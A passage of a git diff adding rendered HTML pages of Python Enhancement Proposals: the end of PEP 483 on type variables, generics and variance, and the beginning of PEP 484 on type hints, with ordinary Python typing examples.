    +
    +
    +
  • +
+

To allow type annotations in situations from the first example, built-in +containers and container abstract base classes are extended with type +parameters, so that they behave as generic type constructors. +Classes, that behave as generic type constructors are called generic types. +Example:

+
from typing import Iterable
+
+class Task:
+    ...
+
+def work(todo_list: Iterable[Task]) -> None:
+    ...
+
+
+

Here Iterable is a generic type that takes a concrete type Task +and returns a concrete type Iterable[Task].

+

Functions that behave in the type generic manner (as in second example) +are called generic functions. +Type annotations of generic functions are allowed by type variables. +Their semantics with respect to generic types is somewhat similar +to semantics of parameters in functions. But one does not assign +concrete types to type variables, it is the task of a static type checker +to find their possible values and warn the user if it cannot find. +Example:

+
def take_first(seq: Sequence[T]) -> T: # a generic function
+    return seq[0]
+
+accumulator = 0 # type: int
+
+accumulator += take_first([1, 2, 3])   # Safe, T deduced to be int
+accumulator += take_first((2.7, 3.5))  # Unsafe
+
+
+

Type variables are used extensively in type annotations, also internal +machinery of the type inference in type checkers is typically build on +type variables. Therefore, let us consider them in detail.

+
+

Type variables

+

X = TypeVar('X') declares a unique type variable. The name must match +the variable name. By default, a type variable ranges +over all possible types. Example:

+
def do_nothing(one_arg: T, other_arg: T) -> None:
+    pass
+
+do_nothing(1, 2)               # OK, T is int
+do_nothing('abc', UserID(42))  # also OK, T is object
+
+
+

Y = TypeVar('Y', t1, t2, ...). Ditto, constrained to t1, etc. Behaves +similar to Union[t1, t2, ...]. A constrained type variable ranges only +over constrains t1, etc. exactly; subclasses of the constrains are +replaced by the most-derived base class among t1, etc. Examples:

+
    +
  • Function type annotation with a constrained type variable:
    AnyStr = TypeVar('AnyStr', str, bytes)
    +
    +def longest(first: AnyStr, second: AnyStr) -> AnyStr:
    +    return first if len(first) >= len(second) else second
    +
    +result = longest('a', 'abc')  # The inferred type for result is str
    +
    +result = longest('a', b'abc')  # Fails static type check
    +
    +
    +

    In this example, both arguments to longest() must have the same type +(str or bytes), and moreover, even if the arguments are instances +of a common str subclass, the return type is still str, not that +subclass (see next example).

    +
  • +
  • For comparison, if the type variable was unconstrained, the common +subclass would be chosen as the return type, e.g.:
    S = TypeVar('S')
    +
    +def longest(first: S, second: S) -> S:
    +    return first if len(first) >= len(second) else second
    +
    +class MyStr(str): ...
    +
    +result = longest(MyStr('a'), MyStr('abc'))
    +
    +
    +

    The inferred type of result is MyStr (whereas in the AnyStr example +it would be str).

    +
  • +
  • Also for comparison, if a Union is used, the return type also has to be +a Union:
    U = Union[str, bytes]
    +
    +def longest(first: U, second: U) -> U:
    +    return first if len(first) >= len(second) else second
    +
    +result = longest('a', 'abc')
    +
    +
    +

    The inferred type of result is still Union[str, bytes], even though +both arguments are str.

    +

    Note that the type checker will reject this function:

    +
    def concat(first: U, second: U) -> U:
    +    return first + second  # Error: can't concatenate str and bytes
    +
    +
    +

    For such cases where parameters could change their types only simultaneously +one should use constrained type variables.

    +
  • +
+
+
+

Defining and using generic types

+

Users can declare their classes as generic types using +the special building block Generic. The definition +class MyGeneric(Generic[X, Y, ...]): ... defines a generic type +MyGeneric over type variables X, etc. MyGeneric itself becomes +parameterizable, e.g. MyGeneric[int, str, ...] is a specific type with +substitutions X -> int, etc. Example:

+
class CustomQueue(Generic[T]):
+
+    def put(self, task: T) -> None:
+        ...
+    def get(self) -> T:
+        ...
+
+def communicate(queue: CustomQueue[str]) -> Optional[str]:
+    ...
+
+
+

Classes that derive from generic types become generic. +A class can subclass multiple generic types. However, +classes derived from specific types returned by generics are +not generic. Examples:

+
class TodoList(Iterable[T], Container[T]):
+    def check(self, item: T) -> None:
+        ...
+
+def check_all(todo: TodoList[T]) -> None:  # TodoList is generic
+    ...
+
+class URLList(Iterable[bytes]):
+    def scrape_all(self) -> None:
+        ...
+
+def search(urls: URLList) -> Optional[bytes]  # URLList is not generic
+    ...
+
+
+

Subclassing a generic type imposes the subtype relation on the corresponding +specific types, so that TodoList[t1] is a subtype of Iterable[t1] +in the above example.

+

Generic types can be specialized (indexed) in several steps. +Every type variable could be substituted by a specific type +or by another generic type. If Generic appears in the base class list, +then it should contain all type variables, and the order of type parameters is +determined by the order in which they appear in Generic. Examples:

+
Table = Dict[int, T]     # Table is generic
+Messages = Table[bytes]  # Same as Dict[int, bytes]
+
+class BaseGeneric(Generic[T, S]):
+    ...
+
+class DerivedGeneric(BaseGeneric[int, T]): # DerivedGeneric has one parameter
+    ...
+
+SpecificType = DerivedGeneric[int]         # OK
+
+class MyDictView(Generic[S, T, U], Iterable[Tuple[U, T]]):
+    ...
+
+Example = MyDictView[list, int, str]       # S -> list, T -> int, U -> str
+
+
+

If a generic type appears in a type annotation with a type variable omitted, +it is assumed to be Any. Such form could be used as a fallback +to dynamic typing and is allowed for use with issubclass +and isinstance. All type information in instances is erased at runtime. +Examples:

+
def count(seq: Sequence) -> int:      # Same as Sequence[Any]
+    ...
+
+class FrameworkBase(Generic[S, T]):
+    ...
+
+class UserClass:
+    ...
+
+issubclass(UserClass, FrameworkBase)  # This is OK
+
+class Node(Generic[T]):
+   ...
+
+IntNode = Node[int]
+my_node = IntNode()  # at runtime my_node.__class__ is Node
+                     # inferred static type of my_node is Node[int]
+
+
+
+
+

Covariance and Contravariance

+

If t2 is a subtype of t1, then a generic +type constructor GenType is called:

+
    +
  • Covariant, if GenType[t2] is a subtype of GenType[t1] +for all such t1 and t2.
  • +
  • Contravariant, if GenType[t1] is a subtype of GenType[t2] +for all such t1 and t2.
  • +
  • Invariant, if neither of the above is true.
  • +
+

To better understand this definition, let us make an analogy with +ordinary functions. Assume that we have:

+
def cov(x: float) -> float:
+    return 2*x
+
+def contra(x: float) -> float:
+    return -x
+
+def inv(x: float) -> float:
+    return x*x
+
+
+

If x1 < x2, then always cov(x1) < cov(x2), and +contra(x2) < contra(x1), while nothing could be said about inv. +Replacing < with is-subtype-of, and functions with generic type +constructor we get examples of covariant, contravariant, +and invariant behavior. Let us now consider practical examples:

+
    +
  • Union behaves covariantly in all its arguments. +Indeed, as discussed above, Union[t1, t2, ...] is a subtype of +Union[u1, u2, ...], if t1 is a subtype of u1, etc.
  • +
  • FrozenSet[T] is also covariant. Let us consider int and +float in place of T. First, int is a subtype of float. +Second, set of values of FrozenSet[int] is +clearly a subset of values of FrozenSet[float], while set of functions +from FrozenSet[float] is a subset of set of functions +from FrozenSet[int]. Therefore, by definition FrozenSet[int] +is a subtype of FrozenSet[float].
  • +
  • List[T] is invariant. Indeed, although set of values of List[int] +is a subset of values of List[float], only int could be appended +to a List[int], as discussed in section “Background”. Therefore, +List[int] is not a subtype of List[float]. This is a typical +situation with mutable types, they are typically invariant.
  • +
+

One of the best examples to illustrate (somewhat counterintuitive) +contravariant behavior is the callable type. +It is covariant in the return type, but contravariant in the +arguments. For two callable types that +differ only in the return type, the subtype relationship for the +callable types follows that of the return types. Examples:

+
    +
  • Callable[[], int] is a subtype of Callable[[], float].
  • +
  • Callable[[], Manager] is a subtype of Callable[[], Employee].
  • +
+

While for two callable types that differ +only in the type of one argument, the subtype relationship for the +callable types goes in the opposite direction as for the argument +types. Examples:

+
    +
  • Callable[[float], None] is a subtype of Callable[[int], None].
  • +
  • Callable[[Employee], None] is a subtype of Callable[[Manager], None].
  • +
+

Yes, you read that right. Indeed, if +a function that can calculate the salary for a manager is expected:

+
def calculate_all(lst: List[Manager], salary: Callable[[Manager], Decimal]):
+    ...
+
+
+

then Callable[[Employee], Decimal] that can calculate a salary for any +employee is also acceptable.

+

The example with Callable shows how to make more precise type annotations +for functions: choose the most general type for every argument, +and the most specific type for the return value.

+

It is possible to declare the variance for user defined generic types by +using special keywords covariant and contravariant in the +definition of type variables used as parameters. +Types are invariant by default. Examples:

+
T = TypeVar('T')
+T_co = TypeVar('T_co', covariant=True)
+T_contra = TypeVar('T_contra', contravariant=True)
+
+class LinkedList(Generic[T]):  # invariant by default
+    ...
+    def append(self, element: T) -> None:
+        ...
+
+class Box(Generic[T_co]):      #  this type is declared covariant
+    def __init__(self, content: T_co) -> None:
+        self._content = content
+    def get_content(self) -> T_co:
+        return self._content
+
+class Sink(Generic[T_contra]): # this type is declared contravariant
+    def send_to_nowhere(self, data: T_contra) -> None:
+        with open(os.devnull, 'w') as devnull:
+            print(data, file=devnull)
+
+
+

Note, that although the variance is defined via type variables, it is not +a property of type variables, but a property of generic types. +In complex definitions of derived generics, variance only +determined from type variables used. A complex example:

+
T_co = TypeVar('T_co', Employee, Manager, covariant=True)
+T_contra = TypeVar('T_contra', Employee, Manager, contravariant=True)
+
+class Base(Generic[T_contra]):
+    ...
+
+class Derived(Base[T_co]):
+    ...
+
+
+

A type checker finds from the second declaration that Derived[Manager] +is a subtype of Derived[Employee], and Derived[t1] +is a subtype of Base[t1]. +If we denote the is-subtype-of relationship with <, then the +full diagram of subtyping for this case will be:

+
Base[Manager]    >  Base[Employee]
+    v                   v
+Derived[Manager] <  Derived[Employee]
+
+
+

so that a type checker will also find that, e.g., Derived[Manager] is +a subtype of Base[Employee].

+

For more information on type variables, generic types, and variance, +see PEP 484, the mypy docs on +generics, +and Wikipedia.

+
+
+
+

Pragmatics

+

Some things are irrelevant to the theory but make practical use more +convenient. (This is not a full list; I probably missed a few and some +are still controversial or not fully specified.)

+
    +
  • Where a type is expected, None can be substituted for type(None); +e.g. Union[t1, None] == Union[t1, type(None)].
  • +
  • Type aliases, e.g.:
    Point = Tuple[float, float]
    +def distance(point: Point) -> float: ...
    +
    +
    +
  • +
  • Forward references via strings, e.g.:
    class MyComparable:
    +    def compare(self, other: 'MyComparable') -> int: ...
    +
    +
    +
  • +
  • Type variables can be declared in unconstrained, constrained, +or bounded form. The variance of a generic type can also +be indicated using a type variable declared with special keyword +arguments, thus avoiding any special syntax, e.g.:
    T = TypeVar('T', bound=complex)
    +
    +def add(x: T, y: T) -> T:
    +    return x + y
    +
    +T_co = TypeVar('T_co', covariant=True)
    +
    +class ImmutableList(Generic[T_co]): ...
    +
    +
    +
  • +
  • Type declaration in comments, e.g.:
    lst = []  # type: Sequence[int]
    +
    +
    +
  • +
  • Casts using cast(T, obj), e.g.:
    zork = cast(Any, frobozz())
    +
    +
    +
  • +
  • Other things, e.g. overloading and stub modules, see PEP 484.
  • +
+
+

Predefined generic types and Protocols in typing.py

+

(See also the typing.py module.)

+
    +
  • Everything from collections.abc (but Set renamed to AbstractSet).
  • +
  • Dict, List, Set, FrozenSet, a few more.
  • +
  • re.Pattern[AnyStr], re.Match[AnyStr].
  • +
  • io.IO[AnyStr], io.TextIO ~ io.IO[str], io.BinaryIO ~ io.IO[bytes].
  • +
+
+
+ +
+

References and Footnotes

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0483.rst

+

Last modified: 2024-02-11 04:14:42 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0484/index.html b/pep-0484/index.html new file mode 100644 index 00000000000..5ff4f270868 --- /dev/null +++ b/pep-0484/index.html @@ -0,0 +1,2458 @@ + + + + + + + + PEP 484 – Type Hints | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 484 – Type Hints

+
+
Author:
+
Guido van Rossum <guido at python.org>, Jukka Lehtosalo <jukka.lehtosalo at iki.fi>, Łukasz Langa <lukasz at python.org>
+
BDFL-Delegate:
+
Mark Shannon
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
29-Sep-2014
+
Python-Version:
+
3.5
+
Post-History:
+
16-Jan-2015, 20-Mar-2015, 17-Apr-2015, 20-May-2015, 22-May-2015
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 3107 introduced syntax for function annotations, but the semantics +were deliberately left undefined. There has now been enough 3rd party +usage for static type analysis that the community would benefit from +a standard vocabulary and baseline tools within the standard library.

+

This PEP introduces a provisional module to provide these standard +definitions and tools, along with some conventions for situations +where annotations are not available.

+

Note that this PEP still explicitly does NOT prevent other uses of +annotations, nor does it require (or forbid) any particular processing +of annotations, even when they conform to this specification. It +simply enables better coordination, as PEP 333 did for web frameworks.

+

For example, here is a simple function whose argument and return type +are declared in the annotations:

+
def greeting(name: str) -> str:
+    return 'Hello ' + name
+
+
+

While these annotations are available at runtime through the usual +__annotations__ attribute, no type checking happens at runtime. +Instead, the proposal assumes the existence of a separate off-line +type checker which users can run over their source code voluntarily. +Essentially, such a type checker acts as a very powerful linter. +(While it would of course be possible for individual users to employ +a similar checker at run time for Design By Contract enforcement or +JIT optimization, those tools are not yet as mature.)

+

The proposal is strongly inspired by mypy. For example, the +type “sequence of integers” can be written as Sequence[int]. The +square brackets mean that no new syntax needs to be added to the +language. The example here uses a custom type Sequence, imported +from a pure-Python module typing. The Sequence[int] notation +works at runtime by implementing __getitem__() in the metaclass +(but its significance is primarily to an offline type checker).

+

The type system supports unions, generic types, and a special type +named Any which is consistent with (i.e. assignable to and from) all +types. This latter feature is taken from the idea of gradual typing. +Gradual typing and the full type system are explained in PEP 483.

+

Other approaches from which we have borrowed or to which ours can be +compared and contrasted are described in PEP 482.

+
+
+

Rationale and Goals

+

PEP 3107 added support for arbitrary annotations on parts of a +function definition. Although no meaning was assigned to annotations +then, there has always been an implicit goal to use them for type +hinting, which is listed as the first possible use case +in said PEP.

+

This PEP aims to provide a standard syntax for type annotations, +opening up Python code to easier static analysis and refactoring, +potential runtime type checking, and (perhaps, in some contexts) +code generation utilizing type information.

+

Of these goals, static analysis is the most important. This includes +support for off-line type checkers such as mypy, as well as providing +a standard notation that can be used by IDEs for code completion and +refactoring.

+
+

Non-goals

+

While the proposed typing module will contain some building blocks for +runtime type checking – in particular the get_type_hints() +function – third party packages would have to be developed to +implement specific runtime type checking functionality, for example +using decorators or metaclasses. Using type hints for performance +optimizations is left as an exercise for the reader.

+

It should also be emphasized that Python will remain a dynamically +typed language, and the authors have no desire to ever make type hints +mandatory, even by convention.

+
+
+
+

The meaning of annotations

+

Any function without annotations should be treated as having the most +general type possible, or ignored, by any type checker. Functions +with the @no_type_check decorator should be treated as having +no annotations.

+

It is recommended but not required that checked functions have +annotations for all arguments and the return type. For a checked +function, the default annotation for arguments and for the return type +is Any. An exception is the first argument of instance and +class methods. If it is not annotated, then it is assumed to have the +type of the containing class for instance methods, and a type object +type corresponding to the containing class object for class methods. +For example, in class A the first argument of an instance method +has the implicit type A. In a class method, the precise type of +the first argument cannot be represented using the available type +notation.

+

(Note that the return type of __init__ ought to be annotated with +-> None. The reason for this is subtle. If __init__ assumed +a return annotation of -> None, would that mean that an +argument-less, un-annotated __init__ method should still be +type-checked? Rather than leaving this ambiguous or introducing an +exception to the exception, we simply say that __init__ ought to +have a return annotation; the default behavior is thus the same as for +other methods.)

+

A type checker is expected to check the body of a checked function for +consistency with the given annotations. The annotations may also be +used to check correctness of calls appearing in other checked functions.

+

Type checkers are expected to attempt to infer as much information as +necessary. The minimum requirement is to handle the builtin +decorators @property, @staticmethod and @classmethod.

+
+
+

Type Definition Syntax

+

The syntax leverages PEP 3107-style annotations with a number of +extensions described in sections below. In its basic form, type +hinting is used by filling function annotation slots with classes:

+
def greeting(name: str) -> str:
+    return 'Hello ' + name
+
+
+

This states that the expected type of the name argument is +str. Analogically, the expected return type is str.

+

Expressions whose type is a subtype of a specific argument type are +also accepted for that argument.

+
+

Acceptable type hints

+

Type hints may be built-in classes (including those defined in +standard library or third-party extension modules), abstract base +classes, types available in the types module, and user-defined +classes (including those defined in the standard library or +third-party modules).

+

While annotations are normally the best format for type hints, +there are times when it is more appropriate to represent them +by a special comment, or in a separately distributed stub +file. (See below for examples.)

+

Annotations must be valid expressions that evaluate without raising +exceptions at the time the function is defined (but see below for +forward references).

+

Annotations should be kept simple or static analysis tools may not be +able to interpret the values. For example, dynamically computed types +are unlikely to be understood. (This is an +intentionally somewhat vague requirement, specific inclusions and +exclusions may be added to future versions of this PEP as warranted by +the discussion.)

+

In addition to the above, the following special constructs defined +below may be used: None, Any, Union, Tuple, +Callable, all ABCs and stand-ins for concrete classes exported +from typing (e.g. Sequence and Dict), type variables, and +type aliases.

+

All newly introduced names used to support features described in +following sections (such as Any and Union) are available in +the typing module.

+
+
+

Using None

+

When used in a type hint, the expression None is considered +equivalent to type(None).

+
+
+

Type aliases

+

Type aliases are defined by simple variable assignments:

+
Url = str
+
+def retry(url: Url, retry_count: int) -> None: ...
+
+
+

Note that we recommend capitalizing alias names, since they represent +user-defined types, which (like user-defined classes) are typically +spelled that way.

+

Type aliases may be as complex as type hints in annotations – +anything that is acceptable as a type hint is acceptable in a type +alias:

+
from typing import TypeVar, Iterable, Tuple
+
+T = TypeVar('T', int, float, complex)
+Vector = Iterable[Tuple[T, T]]
+
+def inproduct(v: Vector[T]) -> T:
+    return sum(x*y for x, y in v)
+def dilate(v: Vector[T], scale: T) -> Vector[T]:
+    return ((x * scale, y * scale) for x, y in v)
+vec = []  # type: Vector[float]
+
+
+

This is equivalent to:

+
from typing import TypeVar, Iterable, Tuple
+
+T = TypeVar('T', int, float, complex)
+
+def inproduct(v: Iterable[Tuple[T, T]]) -> T:
+    return sum(x*y for x, y in v)
+def dilate(v: Iterable[Tuple[T, T]], scale: T) -> Iterable[Tuple[T, T]]:
+    return ((x * scale, y * scale) for x, y in v)
+vec = []  # type: Iterable[Tuple[float, float]]
+
+
+
+
+

Callable

+

Frameworks expecting callback functions of specific signatures might be +type hinted using Callable[[Arg1Type, Arg2Type], ReturnType]. +Examples:

+
from typing import Callable
+
+def feeder(get_next_item: Callable[[], str]) -> None:
+    # Body
+
+def async_query(on_success: Callable[[int], None],
+                on_error: Callable[[int, Exception], None]) -> None:
+    # Body
+
+
+

It is possible to declare the return type of a callable without +specifying the call signature by substituting a literal ellipsis +(three dots) for the list of arguments:

+
def partial(func: Callable[..., str], *args) -> Callable[..., str]:
+    # Body
+
+
+

Note that there are no square brackets around the ellipsis. The +arguments of the callback are completely unconstrained in this case +(and keyword arguments are acceptable).

+

Since using callbacks with keyword arguments is not perceived as a +common use case, there is currently no support for specifying keyword +arguments with Callable. Similarly, there is no support for +specifying callback signatures with a variable number of arguments of a +specific type.

+

Because typing.Callable does double-duty as a replacement for +collections.abc.Callable, isinstance(x, typing.Callable) is +implemented by deferring to isinstance(x, collections.abc.Callable). +However, isinstance(x, typing.Callable[...]) is not supported.

+
+
+

Generics

+

Since type information about objects kept in containers cannot be +statically inferred in a generic way, abstract base classes have been +extended to support subscription to denote expected types for container +elements. Example:

+
from typing import Mapping, Set
+
+def notify_by_email(employees: Set[Employee], overrides: Mapping[str, str]) -> None: ...
+
+
+

Generics can be parameterized by using a new factory available in +typing called TypeVar. Example:

+
from typing import Sequence, TypeVar
+
+T = TypeVar('T')      # Declare type variable
+
+def first(l: Sequence[T]) -> T:   # Generic function
+    return l[0]
+
+
+

In this case the contract is that the returned value is consistent with +the elements held by the collection.

+

A TypeVar() expression must always directly be assigned to a +variable (it should not be used as part of a larger expression). The +argument to TypeVar() must be a string equal to the variable name +to which it is assigned. Type variables must not be redefined.

+

TypeVar supports constraining parametric types to a fixed set of possible +types (note: those types cannot be parameterized by type variables). For +example, we can define a type variable that ranges over just str and +bytes. By default, a type variable ranges over all possible types. +Example of constraining a type variable:

+
from typing import TypeVar, Text
+
+AnyStr = TypeVar('AnyStr', Text, bytes)
+
+def concat(x: AnyStr, y: AnyStr) -> AnyStr:
+    return x + y
+
+
+

The function concat can be called with either two str arguments +or two bytes arguments, but not with a mix of str and bytes +arguments.

+

There should be at least two constraints, if any; specifying a single +constraint is disallowed.

+

Subtypes of types constrained by a type variable should be treated +as their respective explicitly listed base types in the context of the +type variable. Consider this example:

+
class MyStr(str): ...
+
+x = concat(MyStr('apple'), MyStr('pie'))
+
+
+

The call is valid but the type variable AnyStr will be set to +str and not MyStr. In effect, the inferred type of the return +value assigned to x will also be str.

+

Additionally, Any is a valid value for every type variable. +Consider the following:

+
def count_truthy(elements: List[Any]) -> int:
+    return sum(1 for elem in elements if elem)
+
+
+

This is equivalent to omitting the generic notation and just saying +elements: List.

+
+
+

User-defined generic types

+

You can include a Generic base class to define a user-defined class +as generic. Example:

+
from typing import TypeVar, Generic
+from logging import Logger
+
+T = TypeVar('T')
+
+class LoggedVar(Generic[T]):
+    def __init__(self, value: T, name: str, logger: Logger) -> None:
+        self.name = name
+        self.logger = logger
+        self.value = value
+
+    def set(self, new: T) -> None:
+        self.log('Set ' + repr(self.value))
+        self.value = new
+
+    def get(self) -> T:
+        self.log('Get ' + repr(self.value))
+        return self.value
+
+    def log(self, message: str) -> None:
+        self.logger.info('{}: {}'.format(self.name, message))
+
+
+

Generic[T] as a base class defines that the class LoggedVar +takes a single type parameter T. This also makes T valid as +a type within the class body.

+

The Generic base class uses a metaclass that defines __getitem__ +so that LoggedVar[t] is valid as a type:

+
from typing import Iterable
+
+def zero_all_vars(vars: Iterable[LoggedVar[int]]) -> None:
+    for var in vars:
+        var.set(0)
+
+
+

A generic type can have any number of type variables, and type variables +may be constrained. This is valid:

+
from typing import TypeVar, Generic
+...
+
+T = TypeVar('T')
+S = TypeVar('S')
+
+class Pair(Generic[T, S]):
+    ...
+
+
+

Each type variable argument to Generic must be distinct. This is +thus invalid:

+
from typing import TypeVar, Generic
+...
+
+T = TypeVar('T')
+
+class Pair(Generic[T, T]):   # INVALID
+    ...
+
+
+

The Generic[T] base class is redundant in simple cases where you +subclass some other generic class and specify type variables for its +parameters:

+
from typing import TypeVar, Iterator
+
+T = TypeVar('T')
+
+class MyIter(Iterator[T]):
+    ...
+
+
+

That class definition is equivalent to:

+
class MyIter(Iterator[T], Generic[T]):
+    ...
+
+
+

You can use multiple inheritance with Generic:

+
from typing import TypeVar, Generic, Sized, Iterable, Container, Tuple
+
+T = TypeVar('T')
+
+class LinkedList(Sized, Generic[T]):
+    ...
+
+K = TypeVar('K')
+V = TypeVar('V')
+
+class MyMapping(Iterable[Tuple[K, V]],
+                Container[Tuple[K, V]],
+                Generic[K, V]):
+    ...
+
+
+

Subclassing a generic class without specifying type parameters assumes +Any for each position. In the following example, MyIterable +is not generic but implicitly inherits from Iterable[Any]:

+
from typing import Iterable
+
+class MyIterable(Iterable):  # Same as Iterable[Any]
+    ...
+
+
+

Generic metaclasses are not supported.

+
+
+

Scoping rules for type variables

+

Type variables follow normal name resolution rules. +However, there are some special cases in the static typechecking context:

+
    +
  • A type variable used in a generic function could be inferred to represent +different types in the same code block. Example:
    from typing import TypeVar, Generic
    +
    +T = TypeVar('T')
    +
    +def fun_1(x: T) -> T: ...  # T here
    +def fun_2(x: T) -> T: ...  # and here could be different
    +
    +fun_1(1)                   # This is OK, T is inferred to be int
    +fun_2('a')                 # This is also OK, now T is str
    +
    +
    +
  • +
  • A type variable used in a method of a generic class that coincides +with one of the variables that parameterize this class is always bound +to that variable. Example:
    from typing import TypeVar, Generic
    +
    +T = TypeVar('T')
    +
    +class MyClass(Generic[T]):
    +    def meth_1(self, x: T) -> T: ...  # T here
    +    def meth_2(self, x: T) -> T: ...  # and here are always the same
    +
    +a = MyClass()  # type: MyClass[int]
    +a.meth_1(1)    # OK
    +a.meth_2('a')  # This is an error!
    +
    +
    +
  • +
  • A type variable used in a method that does not match any of the variables +that parameterize the class makes this method a generic function in that +variable:
    T = TypeVar('T')
    +S = TypeVar('S')
    +class Foo(Generic[T]):
    +    def method(self, x: T, y: S) -> S:
    +        ...
    +
    +x = Foo()               # type: Foo[int]
    +y = x.method(0, "abc")  # inferred type of y is str
    +
    +
    +
  • +
  • Unbound type variables should not appear in the bodies of generic functions, +or in the class bodies apart from method definitions:
    T = TypeVar('T')
    +S = TypeVar('S')
    +
    +def a_fun(x: T) -> None:
    +    # this is OK
    +    y = []  # type: List[T]
    +    # but below is an error!
    +    y = []  # type: List[S]
    +
    +class Bar(Generic[T]):
    +    # this is also an error
    +    an_attr = []  # type: List[S]
    +
    +    def do_something(x: S) -> S:  # this is OK though
    +        ...
    +
    +
    +
  • +
  • A generic class definition that appears inside a generic function +should not use type variables that parameterize the generic function:
    from typing import List
    +
    +def a_fun(x: T) -> None:
    +
    +    # This is OK
    +    a_list = []  # type: List[T]
    +    ...
    +
    +    # This is however illegal
    +    class MyGeneric(Generic[T]):
    +        ...
    +
    +
    +
  • +
  • A generic class nested in another generic class cannot use same type +variables. The scope of the type variables of the outer class +doesn’t cover the inner one:
    T = TypeVar('T')
    +S = TypeVar('S')
    +
    +class Outer(Generic[T]):
    +    class Bad(Iterable[T]):       # Error
    +        ...
    +    class AlsoBad:
    +        x = None  # type: List[T] # Also an error
    +
    +    class Inner(Iterable[S]):     # OK
    +        ...
    +    attr = None  # type: Inner[T] # Also OK
    +
    +
    +
  • +
+
+
+

Instantiating generic classes and type erasure

+

User-defined generic classes can be instantiated. Suppose we write +a Node class inheriting from Generic[T]:

+
from typing import TypeVar, Generic
+
+T = TypeVar('T')
+
+class Node(Generic[T]):
+    ...
+
+
+

To create Node instances you call Node() just as for a regular +class. At runtime the type (class) of the instance will be Node. +But what type does it have to the type checker? The answer depends on +how much information is available in the call. If the constructor +(__init__ or __new__) uses T in its signature, and a +corresponding argument value is passed, the type of the corresponding +argument(s) is substituted. Otherwise, Any is assumed. Example:

+
from typing import TypeVar, Generic
+
+T = TypeVar('T')
+
+class Node(Generic[T]):
+    x = None  # type: T # Instance attribute (see below)
+    def __init__(self, label: T = None) -> None:
+        ...
+
+x = Node('')  # Inferred type is Node[str]
+y = Node(0)   # Inferred type is Node[int]
+z = Node()    # Inferred type is Node[Any]
+
+
+

In case the inferred type uses [Any] but the intended type is more +specific, you can use a type comment (see below) to force the type of +the variable, e.g.:

+
# (continued from previous example)
+a = Node()  # type: Node[int]
+b = Node()  # type: Node[str]
+
+
+

Alternatively, you can instantiate a specific concrete type, e.g.:

+
# (continued from previous example)
+p = Node[int]()
+q = Node[str]()
+r = Node[int]('')  # Error
+s = Node[str](0)   # Error
+
+
+

Note that the runtime type (class) of p and q is still just Node +– Node[int] and Node[str] are distinguishable class objects, but +the runtime class of the objects created by instantiating them doesn’t +record the distinction. This behavior is called “type erasure”; it is +common practice in languages with generics (e.g. Java, TypeScript).

+

Using generic classes (parameterized or not) to access attributes will result +in type check failure. Outside the class definition body, a class attribute +cannot be assigned, and can only be looked up by accessing it through a +class instance that does not have an instance attribute with the same name:

+
# (continued from previous example)
+Node[int].x = 1  # Error
+Node[int].x      # Error
+Node.x = 1       # Error
+Node.x           # Error
+type(p).x        # Error
+p.x              # Ok (evaluates to None)
+Node[int]().x    # Ok (evaluates to None)
+p.x = 1          # Ok, but assigning to instance attribute
+
+
+

Generic versions of abstract collections like Mapping or Sequence +and generic versions of built-in classes – List, Dict, Set, +and FrozenSet – cannot be instantiated. However, concrete user-defined +subclasses thereof and generic versions of concrete collections can be +instantiated:

+
data = DefaultDict[int, bytes]()
+
+
+

Note that one should not confuse static types and runtime classes. +The type is still erased in this case and the above expression is +just a shorthand for:

+
data = collections.defaultdict()  # type: DefaultDict[int, bytes]
+
+
+

It is not recommended to use the subscripted class (e.g. Node[int]) +directly in an expression – using a type alias (e.g. IntNode = Node[int]) +instead is preferred. (First, creating the subscripted class, +e.g. Node[int], has a runtime cost. Second, using a type alias +is more readable.)

+
+
+

Arbitrary generic types as base classes

+

Generic[T] is only valid as a base class – it’s not a proper type. +However, user-defined generic types such as LinkedList[T] from the +above example and built-in generic types and ABCs such as List[T] +and Iterable[T] are valid both as types and as base classes. For +example, we can define a subclass of Dict that specializes type +arguments:

+
from typing import Dict, List, Optional
+
+class Node:
+    ...
+
+class SymbolTable(Dict[str, List[Node]]):
+    def push(self, name: str, node: Node) -> None:
+        self.setdefault(name, []).append(node)
+
+    def pop(self, name: str) -> Node:
+        return self[name].pop()
+
+    def lookup(self, name: str) -> Optional[Node]:
+        nodes = self.get(name)
+        if nodes:
+            return nodes[-1]
+        return None
+
+
+

SymbolTable is a subclass of dict and a subtype of Dict[str, +List[Node]].

+

If a generic base class has a type variable as a type argument, this +makes the defined class generic. For example, we can define a generic +LinkedList class that is iterable and a container:

+
from typing import TypeVar, Iterable, Container
+
+T = TypeVar('T')
+
+class LinkedList(Iterable[T], Container[T]):
+    ...
+
+
+

Now LinkedList[int] is a valid type. Note that we can use T +multiple times in the base class list, as long as we don’t use the +same type variable T multiple times within Generic[...].

+

Also consider the following example:

+
from typing import TypeVar, Mapping
+
+T = TypeVar('T')
+
+class MyDict(Mapping[str, T]):
+    ...
+
+
+

In this case MyDict has a single parameter, T.

+
+
+

Abstract generic types

+

The metaclass used by Generic is a subclass of abc.ABCMeta. +A generic class can be an ABC by including abstract methods +or properties, and generic classes can also have ABCs as base +classes without a metaclass conflict.

+
+
+

Type variables with an upper bound

+

A type variable may specify an upper bound using bound=<type> (note: +<type> itself cannot be parameterized by type variables). This means that an +actual type substituted (explicitly or implicitly) for the type variable must +be a subtype of the boundary type. Example:

+
from typing import TypeVar, Sized
+
+ST = TypeVar('ST', bound=Sized)
+
+def longer(x: ST, y: ST) -> ST:
+    if len(x) > len(y):
+        return x
+    else:
+        return y
+
+longer([1], [1, 2])  # ok, return type List[int]
+longer({1}, {1, 2})  # ok, return type Set[int]
+longer([1], {1, 2})  # ok, return type Collection[int]
+
+
+

An upper bound cannot be combined with type constraints (as in used +AnyStr, see the example earlier); type constraints cause the +inferred type to be _exactly_ one of the constraint types, while an +upper bound just requires that the actual type is a subtype of the +boundary type.

+
+
+

Covariance and contravariance

+

